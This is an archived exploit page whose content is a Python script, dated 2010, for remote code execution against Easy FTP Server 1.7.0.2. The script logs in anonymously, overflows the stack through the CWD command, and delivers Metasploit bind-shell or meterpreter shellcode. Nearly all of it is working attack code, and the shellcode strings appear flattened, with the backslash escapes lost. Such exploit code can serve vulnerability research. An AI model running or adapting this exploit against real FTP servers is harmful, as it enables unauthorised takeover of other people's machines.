Home / os / winme

RCE_easy_ftp_server_1.7.0.2.py.txt

Posted on 01 March 2010

#!/usr/bin/env python # RCE for Easy FTP Server 1.7.0.2 w/ RET overwrite # app @ http://code.google.com/p/easyftpsvr/ # Copyright 2010 Paul Makowski, GPLv2 # explanation of technique: http://wp.me/pBV1X-3Q # based on: http://seclists.org/bugtraq/2010/Feb/202 # version 0.1 import socket from sys import exit from optparse import OptionParser parser = OptionParser() parser.add_option("-t", "--target", dest="target", metavar="TARGET", type="string", help="target IP address") parser.add_option("-p", "--port", dest="port", metavar="PORT", type="string", help="target port") (options, args) = parser.parse_args() if not options.target: parser.error("Target unspecified.") if not options.port: options.port = 21 # -- # s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect = s.connect((options.target, int(options.port))) print "[+] connected" except: print "[-] connection failed" exit(1) # get to vulnerable code (post auth, defaults allow anon login) s.recv(1024) s.send("USER anonymous ") s.recv(1024) s.send("PASS anonymous ") s.recv(1024) ### fixRet ### # ret is located @ 0x009afe64 & needs to be replaced with part of our payload (or NOPs) fixRet = ( "x31xc0" + # xor %eax,%eax "x31xdb" + # xor %ebx,%ebx "x31xc9" + # xor %ecx,%ecx "xb8xcex54x30xaa" + # mov $0xaa3054ce,%eax "xbbxaaxaaxaaxaa" + # mov $0xaaaaaaaa,%ebx "x31xd8" + # xor %ebx,%eax (now %eax should hold 0x009AFE64) #"xb9x90x90x90x90" + # mov $0x90909090,%ecx (use this if your payload <= 233 bytes) #"xb9x1ax29xebx0e" + # mov $0xeeb291a,%ecx (4 bytes of bind_tcp payload to overwrite RET with) "xb9x5fxe4xe0xae" + # mov $0xaee0e45f,%ecx (4 bytes of meterpreter_bind_tcp payload to overwrite RET with) "x89x08" ) # mov %ecx,(%eax) ### payloads ### # $ ./msfpayload windows/shell_bind_tcp R | ./msfencode -b "x00x0ax0dxff" # [*] x86/shikata_ga_nai succeeded with size 369 (iteration=1) bind_tcp = ( # this will go before the RET location "x33xc9xb1x56xd9xf6xd9x74x24xf4xbbxcbxf4x35" + "xcbx58x31x58x15x83xe8xfcx03x58x11x29x01xc9" + "x23x24xeax32xb4x56x62xd7x85x44x10x93xb4x58" + "x52xf1x34x13x36xe2xcfx51x9fx05x67xdfxf9x28" + "x78xeexc5xe7xbax71xbaxf5xeex51x83x35xe3x90" + "xc4x28x0cxc0x9dx27xbfxf4xaax7ax7cxf5x7cxf1" + "x3cx8dxf9xc6xc9x27x03x17x61x3cx4bx8fx09x1a" + "x6cxaexdex79x50xf9x6bx49x22xf8xbdx80xcbxca" + "x81x4exf2xe2x0fx8fx32xc4xefxfax48x36x8dxfc" + "x8ax44x49x89x0exee" + # these 4 bytes will be written over RET by fixRet "x1ax29xebx0e" + # this will go after the RET location "xcexafx78x1c" + "xbbxa4x27x01x3ax69x5cx3dxb7x8cxb3xb7x83xaa" + "x17x93x50xd3x0ex79x36xecx51x25xe7x48x19xc4" + "xfcxeax40x81x31xc0x7ax51x5ex53x08x63xc1xcf" + "x86xcfx8axc9x51x2fxa1xadxcexcex4axcdxc7x14" + "x1ex9dx7fxbcx1fx76x80x41xcaxd8xd0xedxa5x98" + "x80x4dx16x70xcbx41x49x60xf4x8bxfcxa7x3axef" + "xacx4fx3fx0fx42xd3xb6xe9x0exfbx9exa2xa6x39" + "xc5x7ax50x42x2fxd7xc9xd4x67x31xcdxdbx77x17" + "x7dx70xdfxf0xf6x9axe4xe1x08xb7x4cx6bx31x5f" + "x06x05xf3xfex17x0cx63x63x85xcbx74xeaxb6x43" + "x22xbbx09x9axa6x51x33x34xd5xa8xa5x7fx5dx76" + "x16x81x5fxfbx22xa5x4fxc5xabxe1x3bx99xfdxbf" + "x95x5fx54x0ex4cx09x0bxd8x18xccx67xdbx5exd1" + "xadxadxbfx63x18xe8xc0x4bxccxfcxb9xb6x6cx02" + "x10x73x9cx49x39xd5x35x14xabx64x58xa7x01xaa" + "x65x24xa0x52x92x34xc1x57xdexf2x39x25x4fx97" + "x3dx9ax70xb2x34" ) # $ ./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -b "x00x0ax0dxffx2fx5c" # [*] x86/shikata_ga_nai succeeded with size 326 (iteration=1) meterpreter_bind_tcp = ( # this will go before the RET location "xbfxddx9fx97x4fx29xc9xb1x4bxdaxc2xd9x74x24" + "xf4x5dx31x7dx11x03x7dx11x83xedxfcxe2x28x63" + "x7fxc6xd2x9cx80xb9x5bx79xb1xebx3fx09xe0x3b" + "x34x5fx09xb7x18x74x9axb5xb4x7bx2bx73xe2xb2" + "xacxb5x2ax18x6exd7xd6x63xa3x37xe7xabxb6x36" + "x20xd1x39x6axf9x9dxe8x9bx8exe0x30x9dx40x6f" + "x08xe5xe5xb0xfd" # these 4 bytes will be written over RET by fixRet "x5fxe4xe0xae" + # this will go after the RET location "xd4xaex18xc4xb3" + "x0ex18x09xa0x72x53x26x13x01x62xeex6dxeax54" + "xcex22xd5x58xc3x3bx12x5ex3cx4ex68x9cxc1x49" + "xabxdex1dxdfx29x78xd5x47x89x78x3ax11x5ax76" + "xf7x55x04x9bx06xb9x3fxa7x83x3cxefx21xd7x1a" + "x2bx69x83x03x6axd7x62x3bx6cxbfxdbx99xe7x52" + "x0fx9bxaax3axfcx96x54xbbx6axa0x27x89x35x1a" + "xafxa1xbex84x28xc5x94x71xa6x38x17x82xefxfe" + "x43xd2x87xd7xebxb9x57xd7x39x6dx07x77x92xce" + "xf7x37x42xa7x1dxb8xbdxd7x1ex12xd6x29x3bxce" + "xb1x4bxbbxe0x1dxc5x5dx68x8ex83xf6x05x6cxf0" + "xcfxb2x8fxd2x7cx6ax18x6ax6bxacx27x6bxbex9e" + "x84xc3x28x55xc7xd7x49x6axc2x7fx1exfdx98x11" + "x6dx9fx9dx3bx07x5fx08xc0x81x08xa4xcaxf4x7f" + "x6bx34xd3x0bxa2xa0x9bx63xcbx24x1bx74x9dx2e" + "x1bx1cx79x0bx48x39x86x86xfdx92x13x29x57x46" + "xb3x41x55xb1xf3xcdxa6x94x05x31x71xd1x83x43" + "xf4x31x48xa1" ) #-----------------------attack string------------------------ # retFix | nopsled | payload, part 1 | ret | payload, part 2 #------------------------------------------------------------ print "[*] building attack string" ret = "x58xFDx9Ax00" # 0x009AFD58; taken beforeRetSize = 268 afterRetSize = 233 payload = meterpreter_bind_tcp # switch this to bind_tcp if you wish to use this payload # put retFix in our attack string attackString = fixRet print " [*] added fixRet function; attackString is " + str(len(attackString)) + " bytes long" # append enough NOPs to hit either the beginning of the payload or the location of ret if len(payload) <= afterRetSize + 4: # payload will not occupy any space before ret attackString += "x90" * (beforeRetSize - len(fixRet)) print " [*] payload fits beyond RET location; added a NOP sled to RET location; attackString is " + str(len(attackString)) + " bytes long" else: # payload will occupy space before ret attackString += "x90" * (beforeRetSize - len(fixRet) - (len(payload) - afterRetSize - 4)) print " [*] payload doesn't fit beyond RET location; adding a NOP sled to first part of payload; attackString is " + str(len(attackString)) + " bytes long" # if the payload will not fit beyond the ret, some needs to be written before the ret attackString += payload[:len(payload) - afterRetSize - 4] print " [*] added first part of payload; attackString is " + str(len(attackString)) + " bytes long" # the ret attackString += ret print " [*] added RET value; attackString is " + str(len(attackString)) + " bytes long" # append enough NOPs to hit the payload (only if payload is smaller than afterRetSize) if len(payload) <= afterRetSize: attackString += "x90" * afterRetSize - len(payload) + payload print " [*] payload fits beyond RET location; added a NOP sled and payload; attackString is " + str(len(attackString)) + " bytes long" else: attackString += payload[len(payload) - afterRetSize:] print " [*] payload doesn't fit beyond RET location; adding second part of payload; attackString is " + str(len(attackString)) + " bytes long" ### exploit ### # at this point, attackString should be 505 bytes long print "[*] sending attack string..." s.send('CWD ' + attackString + ' ') print "[+] attach string sent. payload should have executed." s.close()

 

TOP